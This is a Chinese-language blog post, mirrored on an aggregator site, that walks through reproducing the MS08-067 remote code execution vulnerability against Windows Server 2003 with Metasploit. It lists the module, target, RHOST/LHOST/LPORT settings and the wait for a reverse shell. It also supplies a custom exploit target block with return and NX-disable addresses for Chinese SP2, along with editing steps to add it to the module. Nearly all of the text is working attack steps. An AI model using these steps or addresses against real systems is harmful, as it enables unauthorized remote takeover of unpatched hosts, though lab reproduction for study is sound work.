zoukankan      html  css  js  c++  java
  • MS08-067 远程执行代码 漏洞复现

    漏洞编号:MS08-067
    披露日期: 2008/10/22
    受影响的操作系统:Windows 2000;XP;Server 2003;Server 2008;
     
    目标系统 Microsoft(R) Windows(R) Server 2003, Enterprise Edition
    使用工具metasploit 搜索漏洞库
    search ms08_067

    use 载入漏洞

     通过“show options"可以查看所需要的设置;

    yes 都是可填的

    使用" show targets"可以查看渗透攻击模块可以成功攻击的平台;

    我们这里可以看到 有 windos 2003 sp1,sp2 ,xp,2000 更具系统选择利用的payload

    即 设置”set target 34"

      设置攻击目标“set RHOST 目标ip地址”

      设置回传端口"set LPORT 5000"

      设置主机ip" set LHOST 主机ip“

    运行exploit就可以看到成果了 等待反弹shell 但是这里遇到一个问题我的windows server 2003系统是中文的 不是英文的所以需要对ms08_067_netapi_ser2003_zh.rb   

    进行修改 重新打开终端  然后切换到已下目录:/usr/share/metasploit-framework/modules/exploits/windows/smb

    在ms08_067_netapi_ser2003_zh.rb中增加以下代码,修改是4个指针地址

     ['Windows 2003 SP2 Chinese (NX)',

               {

                 'RetDec'    => 0x7c99beb8,  # dec ESI, ret @NTDLL.DLL (0x4EC3)

                 'RetPop'    => 0x7cb5e84e,  # push ESI, pop EBP, ret @SHELL32.DLL(0x565DC3)

                 'JmpESP'    => 0x7c99a01b,  # jmp ESP @NTDLL.DLL(0xFFE4)

                 'DisableNX' => 0x7c96f517,  # NX disable @NTDLL.DLL

                 'Scratch'   => 0x00020408,

               }

              ],

    输入

    vim ms08_067_netapi_ser2003_zh.rb

    :set number 

    输入 /Windows 2003 SP2

    这里我们帮他构建一个   652 -659行复制   输入  10y   回车 

    在p  复制到你想要的地方

    在退出 exit   输入 msfconsole    

    从新复现上面的步骤  search targets    可以看到我们刚刚添加的中文利用版本

      

    重复上面的步骤 发现

    让 目标重启  应该目标机已经崩溃 

    尝试重启目标主机,执行相同操作,攻击成功。

  • 相关阅读:
    Javascript 多浏览器兼容性问题及解决方案
    Vue-学习。
    angular-动画。
    Angular-学习。
    JQuery-学习。
    Bootstrap框架。
    Swiper-轮播图。
    jquery validation表单验证插件2。
    jquery validation表单验证插件。
    Grunt-学习。
  • 原文地址:https://www.cnblogs.com/feizianquan/p/10799873.html
Copyright © 2011-2022 走看看